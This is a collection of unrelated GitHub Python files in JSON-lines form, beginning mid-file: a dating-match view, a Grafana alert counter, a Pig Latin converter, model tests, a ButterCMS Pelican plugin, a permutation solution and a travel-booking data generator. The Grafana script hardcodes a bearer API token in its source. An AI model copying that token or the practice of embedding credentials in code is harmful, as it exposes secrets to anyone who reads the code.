12.5\n \n # Salary range does not match what they want\n else:\n # Check deal breaker\n if logged_in_preference.salary_deal_breaker:\n score -= 25\n else:\n score -= 12.5\n\n \n # After calculating score\n if score < 0:\n score = 0\n\n dic = {\n 'user' : person.user,\n 'score' : score,\n }\n \n # Checking if the user and match have a conversation\n conversation = Conversation.objects.filter(user=logged_in_user).filter(user=person.user)\n if len(conversation) > 0:\n dic['conversation'] = conversation[0]\n\n matches.append(dic)\n\n context = {\n 'page' : page_num,\n 'matches' : matches,\n }\n\n return render(request, 'match/match.html', context)","repo_name":"NathanHaberman/Python-Project-2017","sub_path":"apps/match/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69843141253","text":"#!/usr/bin/env python\n\nimport argparse\nimport json\nimport requests\nimport time\nimport sys\n\n\nversion = 0.50\n\nclass TokenAuth(requests.auth.AuthBase):\n \"\"\"Authentication using a Grafana API token.\"\"\"\n def __init__(self, token):\n self.token = token\n\n def __call__(self, request):\n request.headers.update({\n \"Authorization\": \"Bearer {0}\".format(self.token)\n })\n return request\n\nif __name__ == \"__main__\":\n url = 'http://core1.local:3000/api/alerts'\n g = (requests.get(url, auth=TokenAuth(\"eyJrIjoieWhjZ1pMSlZvdFBsTXgzZXFqQzVSeDNZRnBTbVRSNVYiLCJuIjoibW9uaXRvciIsImlkIjoxfQ==\")).text)\n gdata = json.loads(g)\n issuecount = 0 \n for i in gdata:\n if i['state'] != \"ok\":\n issuecount += 1 \n print(issuecount)\n \n\n","repo_name":"fvanrooyen/alexa-crypto-ask","sub_path":"get-value.py","file_name":"get-value.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19785220036","text":"#Project receives a sentence from a user and converts it to Pig Latin, then returns it to the user\n\n# get sentence from user\noriginal = input('Please enter a sentence: ').strip().lower()\n\n#split sentence into words\nwords = original.split()\n\n# loop through words and convert to pig latin\nnew_words = []\n\nfor word in words:\n if word[0] in \"aeiou\": #for words starting with a vowel, add 'yay'\n add_word = word + 'yay'\n else: # for words starting with consonants, take first consonant cluster and move to back, then add 'ay'\n vowel_pos = 0\n for letter in word:\n if letter not in \"aeiou\":\n vowel_pos += 1\n else:\n break\n add_word = word[vowel_pos:] + word[:vowel_pos] + 'ay'\n new_words.append(add_word)\n\n# stick words back together into sentence\noutput = \" \".join(new_words)\n\n# output the final string\nprint(output)","repo_name":"mmcfarlin107/Python_Bible_Mini_Projects","sub_path":"pig_latin_converter.py","file_name":"pig_latin_converter.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35526648121","text":"from pathlib import Path\n\nimport pandas as pd\nfrom deepdiff import DeepDiff\n\nimport model\n\ncustomer = {\n \"cust\": {\n \"riskperformance\": 0,\n \"externalriskestimate\": 79,\n \"msinceoldesttradeopen\": 133,\n \"msincemostrecenttradeopen\": 2,\n \"averageminfile\": 68,\n \"numsatisfactorytrades\": 27,\n \"numtrades60ever2derogpubrec\": 0,\n \"numtrades90ever2derogpubrec\": 0,\n \"percenttradesneverdelq\": 100,\n \"msincemostrecentdelq\": -7,\n \"maxdelq2publicreclast12m\": 7,\n \"maxdelqever\": 8,\n \"numtotaltrades\": 30,\n \"numtradesopeninlast12m\": 3,\n \"percentinstalltrades\": 36,\n \"msincemostrecentinqexcl7days\": 0,\n \"numinqlast6m\": 4,\n \"numinqlast6mexcl7days\": 4,\n \"netfractionrevolvingburden\": 1,\n \"netfractioninstallburden\": 93,\n \"numrevolvingtradeswbalance\": 4,\n \"numinstalltradeswbalance\": 2,\n \"numbank2natltradeswhighutilization\": 0,\n \"percenttradeswbalance\": 60,\n },\n \"cust_id\": 6,\n}\n\n\nclass MockModel:\n def __init__(self, value=10):\n self.value = value\n\n def score(self, X):\n n = len(X)\n return [self.value] * n\n\n\ndef read_text(file):\n test_directory = Path(__file__).parent\n\n with open(test_directory / file, 'rt', encoding='utf-8') as f_in:\n return f_in.read().strip()\n\n\ndef test_predict():\n model_mock = MockModel(10)\n model_service = model.ModelService(model_mock)\n customer_data = pd.DataFrame([customer[\"cust\"]])\n actual_score = model_service.predict(customer_data)\n expected_score = 10\n\n assert actual_score == expected_score\n\n\ndef test_lambda_handler():\n model_mock = MockModel(10)\n model_version = \"test123\"\n model_service = model.ModelService(model=model_mock, model_version=model_version)\n\n base64_input = read_text('data.b64')\n event = {\n \"Records\": [\n {\n \"kinesis\": {\n \"data\": base64_input,\n },\n }\n ]\n }\n actual_scores = model_service.lambda_handler(event)\n expected_scores = {\n \"predictions\": [\n {\n 'model': 'risk_score_model',\n 'version': model_version,\n 'prediction': {\n 'cust_score': 10,\n 'cust_id': 6,\n },\n },\n ]\n }\n\n assert actual_scores == expected_scores\n\n\ndef test_base64_decode():\n base64_input = read_text('data.b64')\n actual_result = model.base64_decode(base64_input)\n expected_result = customer\n\n assert actual_result == expected_result\n\n\ndef test_prepare_features():\n model_service = model.ModelService(None)\n\n actual_features = model_service.prepare_features(customer)\n expected_features = pd.DataFrame([customer[\"cust\"]])\n print(actual_features)\n print(expected_features)\n\n diff = DeepDiff(\n actual_features.to_dict(orient=\"records\"),\n expected_features.to_dict(orient=\"records\"),\n significant_digits=1,\n )\n assert 'values_changed' not in diff\n assert 'values_change' not in diff\n print(\"Difference is: \", diff)\n\n\n# test_prepare_features()\n","repo_name":"jnsofini/reliable-credit-scoring-system","sub_path":"automation/tests/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"3251118986","text":"from collections import defaultdict\nimport datetime\nimport logging\n\nfrom pelican import signals\n\nfrom operator import attrgetter, itemgetter\nfrom functools import partial\n\nfrom pelican.generators import ArticlesGenerator, Generator\nfrom pelican.contents import Article, Page, Static\nfrom pelican.utils import copy, process_translations, mkdir_p\nfrom pelican.readers import BaseReader, Readers\n\nfrom butter_cms import ButterCMS\n\nfrom dateutil import parser\n\n\nlogger = logging.getLogger()\n\n\nclass ButterGenerator(ArticlesGenerator):\n def __init__(self, *args, **kwargs):\n \"\"\"initialize properties\"\"\"\n self.articles = [] # only articles in default language\n self.translations = []\n self.dates = {}\n self.categories = defaultdict(list)\n self.authors = defaultdict(list)\n super(ButterGenerator, self).__init__(*args, **kwargs)\n\n # 'cause settings is initialized in super\n self.client = ButterCMS(self.settings.get('BUTTER_CONFIG')['api_key'])\n\n # Private helper function to generate\n def _generate_butter_articles(self):\n DEFAULT_CATEGORY = self.settings.get('DEFAULT_CATEGORY')\n baseReader = BaseReader(self.settings)\n\n butter_posts = []\n page = 1\n while True:\n # Paginate through all pages\n result = self.client.posts.all({'page_size': 10, 'page': page})\n if 'data' in result:\n butter_posts.extend(result['data'])\n\n if 'meta' in result and 'next_page' in result['meta'] and result['meta']['next_page']:\n page += 1\n else:\n break\n all_articles = []\n counter = 0\n for post in butter_posts:\n if post['status'] == 'published':\n counter += 1\n logger.info('GET TO article: %s' % post['title'])\n logger.info('counter: %s' % str(counter))\n datestr = post['published'] if 'published' in post else post['created']\n date = parser.parse(datestr)\n title = post['title']\n content = post['body']\n author = post['author']['first_name']\n authorObject = baseReader.process_metadata('author', author)\n slug = post['slug'] if 'slug' in post else None\n logger.info('--HAS slug: %s' % str(slug))\n categoryObj = None\n if post['categories']:\n category = post['categories'][0]['name']\n else:\n category = DEFAULT_CATEGORY\n categoryObj = baseReader.process_metadata('category', category)\n\n metadata = {'title': title,\n 'date': date,\n 'category': categoryObj,\n 'authors': [authorObject]}\n if slug:\n metadata['slug'] = slug\n\n\n article = Article(content=content,\n metadata=metadata,\n settings=self.settings,\n context=self.context)\n\n # # This seems like it cannot happen... but it does without fail.\n article.author = article.authors[0]\n all_articles.append(article)\n\n return all_articles\n\n def generate_context(self):\n # Update the context (only articles in default language)\n self.articles = self.context['articles']\n\n all_articles = []\n\n new_articles = self._generate_butter_articles()\n all_articles.extend(new_articles)\n\n # Continue with the rest of ArticleGenerator, code adapted from:\n # https://github.com/getpelican/pelican/blob/master/pelican/generators.py#L548\n\n # ARTICLE_ORDER_BY doesn't exist in 3.3, which was in Fedora 21.\n # (I wanted to be able to build this on F21 at the time).\n articles, translations = process_translations(all_articles)\n # , order_by=self.settings['ARTICLE_ORDER_BY'])\n self.articles.extend(articles)\n self.translations.extend(translations)\n\n # Disabled for 3.3 compatibility, great.\n # signals.article_generator_pretaxonomy.send(self)\n\n for article in self.articles:\n # only main articles are listed in categories and tags\n # not translations\n self.categories[article.category].append(article)\n if hasattr(article, 'tags'):\n for tag in article.tags:\n self.tags[tag].append(article)\n for author in getattr(article, 'authors', []):\n self.authors[author].append(article)\n\n # This may not technically be right, but...\n # Sort the articles by date too.\n self.articles = list(self.articles)\n self.dates = self.articles\n self.dates.sort(key=attrgetter('date'),\n reverse=self.context['NEWEST_FIRST_ARCHIVES'])\n\n # and generate the output :)\n\n # order the categories per name\n self.categories = list(self.categories.items())\n self.categories.sort(reverse=self.settings['REVERSE_CATEGORY_ORDER'])\n\n self.authors = list(self.authors.items())\n self.authors.sort()\n\n logger.info('++++++++++++++++++++++++++++++++++++')\n logger.info('GOT categories %s' % str(self.categories))\n logger.info('++++++++++++++++++++++++++++++++++++')\n\n self._update_context(('articles', 'dates', 'categories', 'authors'))\n # Disabled for 3.3 compatibility for now, great.\n # self.save_cache()\n # self.readers.save_cache()\n\n # And finish.\n # signals.article_generator_finalized.send(self)\n\n # def generate_output(self, writer):\n # # Intentionally leave this blank\n # pass\n\n def generate_pages(self, writer):\n \"\"\"Generate the pages on the disk\"\"\"\n write = partial(writer.write_file,\n relative_urls=self.settings['RELATIVE_URLS'],\n override_output=True)\n\n # to minimize the number of relative path stuff modification\n # in writer, articles pass first\n # self.generate_articles(write)\n self.generate_period_archives(write)\n self.generate_direct_templates(write)\n\n # and subfolders after that\n self.generate_categories(write)\n self.generate_authors(write)\n\n\ndef get_generators(pelican_object):\n return ButterGenerator\n\n\ndef register():\n signals.get_generators.connect(get_generators)\n","repo_name":"ButterCMS/buttercms-pelican","sub_path":"butter.py","file_name":"butter.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"27637900402","text":"#31. Next Permutation\ndef nextPermutation(nums):\n if len(nums) <= 1:\n return nums\n i , j , k = len(nums) -2, len(nums)-1, len(nums)-1;\n ## take 12385764 as example i points 6 , j k points 4\n # keep moving i, j pair forward if nums[i] <= nums[j]\n # now the i is 5 and j is 7\n while i >=0 and nums[i] >= nums[j]:\n i -= 1\n j -= 1\n # find out the num smaller than i move k forward\n if i >= 0:\n while nums[i] >= nums[k]:\n k -= 1\n # 4 is small than 5 and swap i,k \n nums[i], nums[k] = nums[k], nums[i]\n # we also need to make the whole perm smallest \n # so from j towards need to be revesed \n nums[j:] = reversed(nums[j:])\n \n print(nums)\nnums = [1,4,1]\nnums = [4,1,1]\nnextPermutation(nums)\n\n","repo_name":"git874997967/LeetCode_Python","sub_path":"mid/leetCode31.py","file_name":"leetCode31.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35593486637","text":"import utils\nimport time\nimport random\nimport datetime\nfrom urllib.parse import urlparse, parse_qsl, urlencode\nimport requests\n# use postgres, put results in database. Send everything to checkout service which will automatically put it into the checkout service\nimport json\nimport os\n\nusers = utils.load_json(\"user.json\")\ndestinations = utils.load_json(\"destination.json\")\nhotel = \"http://169.63.175.87:32461/api/v1/hotels\"\ncars = \"http://169.63.175.87:30505/api/v1/cars\"\n# flight = \"http://localhost:9103/api/v2/flights\"\n\n\ndef get_reason(reason):\n chance = random.randint(0, 100)\n if chance > 85:\n return random.choice([\"business\", \"leisure\", \"family\"])\n\n return reason\n\n\ndef get_carhotel_loyalty_status(priority, main_reason, frequency, randnum):\n val = 1\n if priority == \"comfort\":\n val = val * 7\n elif priority == \"luxury\":\n val = val * 6\n elif priority == \"time\":\n val = val * 5\n else:\n val = val * 4\n\n if frequency >= 24:\n val = val * 7\n elif (frequency < 24 and frequency >= 12):\n val = val * 6\n else:\n val = val * 4\n\n if main_reason == \"business\":\n val = val * 8\n elif main_reason == \"family\":\n val = val*4\n else:\n val = val * 6\n\n if val > randnum:\n return True\n\n return False\n\n\ndef get_flight_loyalty_status(priority, main_reason, frequency, randnum):\n val = 1\n if priority == \"comfort\":\n val = val * 8\n elif priority == \"luxury\":\n val = val * 6\n elif priority == \"time\":\n val = val * 3\n else:\n val = val * 4\n\n if frequency >= 24:\n val = val * 8\n elif (frequency < 24 and frequency >= 12):\n val = val * 6\n else:\n val = val * 4\n\n if main_reason == \"business\":\n val = val * 5\n elif main_reason == \"family\":\n val = val * 4\n else:\n val = val * 6\n\n if val > randnum:\n return True\n\n return False\n\n\ndef get_random_num():\n randnum = float(random.randint(0, 100))/100.0\n return randnum\n\n\ndef get_group_size(usual): # usual: whatever num they usually travel with, 80/20 split chance\n rand = random.randint(0, 100)\n if rand > 80:\n return random.randint(1, 6)\n return usual\n\n\ndef get_travel_day_offset(reason, priority):\n chance = random.randint(0, 100)\n if reason == \"business\":\n if chance < 60:\n return random.randint(1, 14)\n elif chance < 90:\n return random.randint(15, 24)\n else:\n return random.randint(25, 30)\n else:\n if priority == \"budget\":\n return random.randint(30, 60)\n else:\n return random.randint(15, 50)\n\n # more likely to be leisure if (1. leaving 20-60 days in advanced (2. also 2 people or more\n # if traveling 1-19 days in advance, 15% chance of being leisure. if also income > 200,000 then only 10% chance of leisure\n # if traveling 20-30 days in advance and 1 person, only 40% chance of being leisure\n # if traveling 20-30 days in advance and 2-3 people, 60% chance of being leisure\n # if traveling 20-30 days in advance and 4 or more people, 90% chance of being leisure\n # if traveling 30-60 days in advanced, 85% chance of leisure\n\n\ndef get_travel_duration(reason, priority): # generate date based on reason\n timed = 0\n if reason == \"business\": # I could also do 80% of the time select 1-7\n if priority == \"time\":\n timed = random.choice([1, 1, 2, 2, 2, 3, 3, 3, 4, 5, 6, 7])\n else:\n timed = random.choice(\n [1, 1, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 6, 6, 7, 7, 8, 9, 10])\n else:\n if priority != \"budget\":\n timed = random.choice([2, 3, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6, 7, 7, 8, 8,\n 8, 8, 8, 9, 9, 9, 9, 9, 10, 10, 11, 12, 13, 14, 14, 15, 16, 16, 16, 17, 18])\n else:\n timed = random.choice(\n [2, 3, 3, 3, 3, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 7, 7, 8, 9, 10, 12, 13, 14])\n return timed\n\n\ndef query_gen(query):\n q = \"\"\n for key, val in query.items():\n if q != \"\":\n q = q + \"&\"\n else:\n q = \"?\"\n q = q + key + \"=\" + val.replace(\" \", \"%20\")\n return q\n\n\ndef kebab_case(val):\n return val.lower().replace(\" \", \"-\")\n\n\ndef get_destination(usual, destinations): # list of frequenty traveled locaitons\n chance = random.randint(0, 100)\n if chance > 80:\n return random.choice(destinations)\n return random.choice(usual)\n\n\ndef convert_tuplelist_to_dict(query_tuple):\n result_dict = {}\n for k, v in query_tuple:\n result_dict[k] = v\n return result_dict\n\n\ndef delete_dict_key(dictionary, key):\n if key in dictionary:\n dictionary.pop(key)\n\n\ndef generate_user_hotel(hotel_full_url, priority, party_size):\n # print(\"\\thotel_full_url: \", hotel_full_url)\n try:\n data = requests.get(hotel_full_url).json()\n if type(data) == list:\n if len(data) != 0: # if the results do not come back empty\n if priority == \"budget\":\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2))\n return sorted_data[0]\n elif priority == \"comfort\":\n num = int(len(data)//2)-1\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2), reverse=True)\n return sorted_data[num]\n\n else:\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2), reverse=True)\n return sorted_data[0]\n else:\n parse_url = urlparse(hotel_full_url)\n #print(\"parse_url: \", parse_url)\n query_tuple = parse_qsl(parse_url.query)\n\n #print(\"\\tquery_dict\", convert_tuplelist_to_dict(query_tuple))\n query_dict = convert_tuplelist_to_dict(query_tuple)\n if \"superchain\" in query_dict:\n #print(\"removing superchain...\")\n delete_dict_key(query_dict, \"superchain\")\n elif \"type\" in query_dict:\n #print(\"removing type...\")\n delete_dict_key(query_dict, \"type\")\n else:\n return \"\\tNo Results -- hotel json generation\\n\"\n new_hotel_url = parse_url.scheme + \"://\" + \\\n parse_url.netloc + parse_url.path + query_gen(query_dict)\n return generate_user_hotel(new_hotel_url, priority, party_size)\n else:\n return \"\\tNo Results -- hotel json generation\\n\"\n except:\n time.sleep(10)\n print(\"EXCEPTION HOTEL\")\n return \"\\tNo Results -- car json generation\"\n # http: // localhost: 9101/api/v1/hotels/indonesia/jakarta?superchain = Urban % 20Lifestyle & type = luxury & dateFrom = 2020-08-03 & dateTo = 2020-08-08\n\n\ndef generate_user_car(car_full_url, priority, party_size):\n try:\n data = requests.get(car_full_url).json()\n if type(data) == list:\n if len(data) != 0: # if the results do not come back empty\n # http://localhost:9102/api/v1/cars/mexico/mexico-city?rental_company=Carlux&style=luxury&dateFrom=2020-07-25&dateTo=2020-07-26\n if priority == \"budget\":\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2))\n return sorted_data[0]\n elif priority == \"comfort\":\n num = int(len(data)//2)-1\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2), reverse=True)\n return sorted_data[num]\n\n else: # if results do not come back empty AND budget/time\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2), reverse=True)\n return sorted_data[0]\n else: # first get request returns empty response, remove loyalty program parameter\n parse_url = urlparse(car_full_url)\n #print(\"parse_url: \", parse_url)\n query_tuple = parse_qsl(parse_url.query)\n #print(\"\\tquery_dict\", convert_tuplelist_to_dict(query_tuple))\n query_dict = convert_tuplelist_to_dict(query_tuple)\n if \"rental_company\" in query_dict:\n #print(\"removing rental company...\")\n delete_dict_key(query_dict, \"rental_company\")\n elif party_size > 4 and priority != \"budget\" and \"style\" in query_dict:\n #print(\"removing style for large party...\")\n delete_dict_key(query_dict, \"style\")\n elif \"body_type\" in query_dict:\n #print(\"removing body_type...\")\n delete_dict_key(query_dict, \"body_type\")\n elif (party_size <= 4 or priority == \"budget\") and (\"style\" in query_dict):\n #print(\"removing style for small party or budget users...\")\n delete_dict_key(query_dict, \"body_type\")\n else:\n return \"\\tNo Results -- hotel json generation\\n\"\n new_hotel_url = parse_url.scheme + \"://\" + \\\n parse_url.netloc + parse_url.path + query_gen(query_dict)\n return generate_user_hotel(new_hotel_url, priority, party_size)\n else:\n return \"\\tNo Results -- car json generation\\n\"\n except:\n time.sleep(10)\n print(\"EXCEPTION CAR\")\n return \"\\tNo Results -- car json generation\"\n\n\n# 1 luxury\n# # if no results remove rental_company=... before the first &\n# # if still no results, remove body_type if party size < 4 and if not then remove style\n# # if still no results, remove style\n# 2 budget\n# # if no results remove rental_company=... before the first &\n# # if still no results, remove body_type if party size < 4 and if not then remove style\n# # if still no results, remove style\n# 3 comfort\n# # if no results remove rental_company=... before the first &\n# # if still no results, remove body_type if party size < 4 and if not then remove style\n# # if still no results, remove style\n\n\ndef format_postgres(one_user_dict, hotel_full_url, car_full_url, priority, party_size):\n string = \"\"\n initialized_dict = {\"totalAmount\": 0.00, \"currency\": \"USD\", \"status\": \"unprocessed\", \"cartItems\": [{}], \"billingDetails\": {\n }, \"paymentMethodDetails\": {\"type\": \"Card\", \"creditcardNumber\": \"0000 0000 0000 0000\", \"expMonth\": 1, \"expYear\": 2050, \"cvc\": \"0000\"}}\n if \"cars\" in car_full_url: # for the future in case we provide a blank string when people do not purchase hotel and car at same time\n carjson = generate_user_car(car_full_url, priority, party_size)\n if (type(carjson) is dict) and (\"error\" not in carjson):\n initialized_dict[\"cartItems\"][0][\"type\"] = \"Car\"\n cartItemsCar_dict = initialized_dict[\"cartItems\"][0]\n cartItemsCar_dict['uuid'] = carjson['id']\n cartItemsCar_dict[\"description\"] = \"description\"\n cartItemsCar_dict[\"cost\"] = carjson[\"cost\"]\n cartItemsCar_dict[\"currency\"] = \"USD\"\n dateTo = car_full_url.split(\n \"&\")[-1].split(\"=\")[1].replace(\"-\", \" \")\n yearTo, monthTo, dayTo = dateTo.split(\" \")\n string = monthTo + \" \" + dayTo + \" \" + yearTo\n cartItemsCar_dict[\"endDate\"] = string\n dateFrom = car_full_url.split(\n \"&\")[-2].split(\"=\")[1].replace(\"-\", \" \")\n yearFrom, monthFrom, dayFrom = dateFrom.split(\" \")\n string = monthFrom + \" \" + dayFrom + \" \" + yearFrom\n cartItemsCar_dict[\"startDate\"] = string\n billingDetails = initialized_dict[\"billingDetails\"]\n # CAN WE ASSUME NAMES ARE ALWAYS JUST 2 WORDS???)\n billingDetails[\"firstName\"] = one_user_dict[\"name\"].split(\" \")[0]\n billingDetails[\"lastName\"] = one_user_dict[\"name\"].split(\" \")[-1]\n billingDetails[\"address\"] = {}\n billingDetails[\"address\"][\"line1\"] = \"00 Non\"\n billingDetails[\"address\"][\"city\"] = one_user_dict[\"city\"]\n billingDetails[\"address\"][\"postalCode\"] = \"00000\"\n billingDetails[\"address\"][\"state\"] = \"Non\"\n billingDetails[\"address\"][\"country\"] = one_user_dict[\"country\"]\n\n if \"hotels\" in hotel_full_url: # set up so a user does not need to purchase both a hotel and car\n hoteljson = generate_user_hotel(hotel_full_url, priority, party_size)\n if (type(hoteljson) == dict) and (\"error\" not in hoteljson):\n initialized_dict[\"cartItems\"].append({})\n initialized_dict[\"cartItems\"][1][\"type\"] = \"Hotel\"\n cartItemsHotel_dict = initialized_dict[\"cartItems\"][1]\n cartItemsHotel_dict['uuid'] = hoteljson[\"id\"]\n cartItemsHotel_dict['description'] = \"description\"\n cartItemsHotel_dict[\"currency\"] = \"USD\"\n cartItemsHotel_dict['cost'] = hoteljson[\"cost\"]\n dateTo_hotel = car_full_url.split(\n \"&\")[-1].split(\"=\")[1].replace(\"-\", \" \")\n yearTo, monthTo, dayTo = dateTo_hotel.split(\" \")\n string = monthTo + \" \" + dayTo + \" \" + yearTo\n cartItemsHotel_dict[\"endDate\"] = string\n dateFrom_hotel = car_full_url.split(\n \"&\")[-2].split(\"=\")[1].replace(\"-\", \" \")\n yearFrom, monthFrom, dayFrom = dateFrom_hotel.split(\" \")\n string = monthFrom + \" \" + dayFrom + \" \" + yearFrom\n cartItemsHotel_dict[\"startDate\"] = string\n\n try:\n initialized_dict[\"totalAmount\"] += initialized_dict[\"cartItems\"][0][\"cost\"] + \\\n initialized_dict[\"cartItems\"][1][\"cost\"]\n # print(initialized_dict)\n return initialized_dict\n\n except:\n return \"Error\"\n return \"Error\"\n\n\ndef posting(params):\n # set dynamic environment var that is sent in\n base_url = 'http://localhost:9402' if \"CHECK_OUT_URL\" not in os.environ else os.environ[\"CHECK_OUT_URL\"]\n response = requests.post(base_url+'/api/v1/checkout/cart', json=params)\n\n # terminal with export CHECK_OUT_URL= http:// xxxxx. Default to local host port you are using if no envir variable\n # is provided\n\n\ndef main():\n counter = 0\n for _ in range(10000): # change back to 100\n total = 0\n for user in users:\n get = user.get\n willTravel = random.randint(0, 100)\n if willTravel > get(\"travel_frequency\"):\n continue\n # print((willTravel, get(\"travel_frequency\")))\n total = total + 1\n priority = user[\"priority\"]\n main_reason = user[\"main_reason_for_travel\"]\n reason = get_reason(main_reason)\n frequency = user[\"travel_frequency\"]\n income = user[\"income\"]\n\n randnum = random.randint(96, 192)\n carLoyal = get_carhotel_loyalty_status(\n priority, main_reason, frequency, randnum)\n hotelLoyal = get_carhotel_loyalty_status(\n priority, main_reason, frequency, randnum)\n flightLoyal = get_flight_loyalty_status(\n priority, main_reason, frequency, randnum)\n carFilter = {}\n flightFilter = {}\n hotelFilter = {}\n party_size = get_group_size(get(\"party_size\"))\n\n if carLoyal:\n carFilter[\"rental_company\"] = user[\"car_rental_loyalty\"]\n if priority != 'budget' and party_size > 4:\n carFilter[\"body_type\"] = \"suv\"\n # body_type, style\n\n if priority == \"budget\":\n carFilter[\"style\"] = \"basic\"\n elif priority == \"comfort\":\n carFilter[\"style\"] = \"premium\"\n else:\n carFilter[\"style\"] = \"luxury\"\n\n if hotelLoyal:\n hotelFilter = {\"superchain\": user[\"hotel_chain_loyalty\"]}\n\n if priority == \"budget\":\n hotelFilter[\"type\"] = \"budget\"\n elif priority == \"comfort\":\n hotelFilter[\"type\"] = \"comfort\"\n else:\n hotelFilter[\"type\"] = \"luxury\"\n\n if flightLoyal:\n flightFilter = {\"airlines\": user[\"airlines_loyalty\"]}\n\n destination = get_destination(\n get(\"frequently_visited_cities\"), destinations)\n offset = get_travel_day_offset(reason, priority)\n duration = get_travel_duration(reason, priority)\n dateFrom = datetime.date.today() + datetime.timedelta(days=offset)\n dateTo = dateFrom + datetime.timedelta(days=duration)\n\n hotelFilter[\"dateFrom\"] = str(dateFrom)\n hotelFilter[\"dateTo\"] = str(dateTo)\n\n carFilter[\"dateFrom\"] = str(dateFrom)\n carFilter[\"dateTo\"] = str(dateTo)\n\n path_params = \"/\" + \\\n kebab_case(destination[\"country\"]) + \\\n \"/\" + kebab_case(destination[\"city\"])\n\n hotel_full_url = hotel + path_params + query_gen(hotelFilter)\n # HOTEL_FULL_URL: http://localhost:9101/api/v1/hotels/romania/bucharest?superchain=Nimbus%20Elites&type=luxury&dateFrom=2020-07-29&dateTo=2020-07-31\n\n car_full_url = cars + path_params + query_gen(carFilter)\n # CAR_FULL_URL: http://localhost:9102/api/v1/cars/turkey/istanbul?rental_company=Capsule&style=luxury&dateFrom=2020-08-27&dateTo=2020-09-04\n postgres = format_postgres(\n user, hotel_full_url, car_full_url, priority, party_size)\n # POSTGRES SETS DATA INTO READABLE FORMAT FOR THE POSTGRES DATABASE\n posting(postgres)\n # POSTS TO POSTGRES DATABASE\n counter += 1\n if counter == 1:\n print(\"iteration: 1\")\n if counter % 100 == 0:\n print(\"iteration: \", counter)\n\n # date depending on reason -> 3 - 30 days for business, 20 - 60 for leisure\n###########################Generation################################################\n # business: 65% of time traveling 1-19 days in advanced,\n # ^^^5/9 of time is 1 person\n # so, 13% of time 20-30 days in advance with 1 person\n # 11% of time 20-30 days in advanced with 2-3 people\n # 5% of the time 20-30 days in advanced with 4 or more people\n # 6% of the time 30-60 days in advanced\n\n # leisure: 35% of time traveling 1-19 days in advanced\n #\n# Extra criteria for leisure:\n# if traveling more than 1 week then leisure\n#####################################################################################\n\n\n#########################Recommendation################################################\n # buisness:\n # --> will choose recommendation based on what most business people choose. Based on income >200000, will choose the fastest option for\n # for inbetween, randomly select OR choose middle priced options\n # flights and most expensive option for time/luxury.. For budget (<100000), choose least expensive recommendations\n\n # business tags for hotel/car:\n\n # more likely to be buisness if traveling with (1. leaving within 3-30 days in advance (2. also, 1 person\n # if traveling 1-19 days in advanced, 85% chance business.\n # unless income > 200,000, 90% chance of being time (time is a rich business man); select highest price\n # if traveling 20-30 days in advanced 60% chance business and 1 person\n # income > 200,000, 60% chance of being time (time is a rich business man)\n # elif traveling 20-30 days in advanced 40% chance business and 2-3 people\n # income > 200,000, still 40% chance of being time (time is a rich business man)\n # elif traveling 20-30 days in advanced 10% chance business and 4 or more people\n # income > 200,000, still 40% chance of being time (time is a rich business man)\n # if traveling 30-60 days in advanced, 15% chance of business\n\n # leisure:\n # --> will choose recommendation based on what most leisure people choose. Based on income >200000, will choose the luxury option\n # for inbetween, randomly select OR choose middle priced options\n # For budget (<100000), choose least expensive recommendations\n\n # more likely to be leisure if (1. leaving 20-60 days in advanced (2. also 2 people or more\n # if traveling 1-19 days in advance, 15% chance of being leisure. if also income > 200,000 then only 10% chance of leisure\n # if traveling 20-30 days in advance and 1 person, only 40% chance of being leisure\n # if traveling 20-30 days in advance and 2-3 people, 60% chance of being leisure\n # if traveling 20-30 days in advance and 4 or more people, 90% chance of being leisure\n # if traveling 30-60 days in advanced, 85% chance of leisure\n\n # time\n # leave also 7-14 days in advanced with high income > 200000: will select highest priced hotel within a 2 week timeline.\n # Will select the shortest duration flight, then most expensive\n # luxury\n # leave 30-60 days in\n # budget\n # will select cheapest\n\n # using same randnum for each selection\n # carRatio = (float(carloyal) / total) * 100.0\n # flightRatio = (float(flightloyal) / total) * 100.0\n\n # print(\"Car Ratio: \", carRatio)\n # print(\"Flight Ratio: \", flightRatio)\n # print()\n\nmain()\n\n# for time look at the income for the type they are looking at\n\n##############Loyalty Rules#####################\n# hotel and car\n# priority:\n# comfort\n# least frequent (baseline): 0.45\n# luxury\n# least frequent (baseline): 0.4\n# time\n# least frequent (baseline): 0.35\n# budget\n# least frequent (baseline): 0.3\n# frequency weight: 2x, 1.5x, 1x\n\n# comfort = 8\n# luxury = 6\n# time = 5\n# budget = 4\n\n# frequent = 8\n# moderate = 6\n# infrequet = 4\n\n# business = 8\n# leisure = 6\n# family = 4\n\n# 256\n# 64\n\n# randomnum\n# the highest range 72 and lowest is 18, so 36 is inbetween for a scorecomparison\n\n# -----------------------------------------------------------\n# flight\n# priority:\n# comfort\n# least frequent (baseline): 0.45\n# luxury\n# least frequent (baseline): 0.4\n# time\n# least frequent (baseline): 0.15\n# budget\n# least frequent (baseline): 0.3\n# frequency weight: 2x, 1.5x, 1.5x, 1x\n\n# threshold, random number to compare with 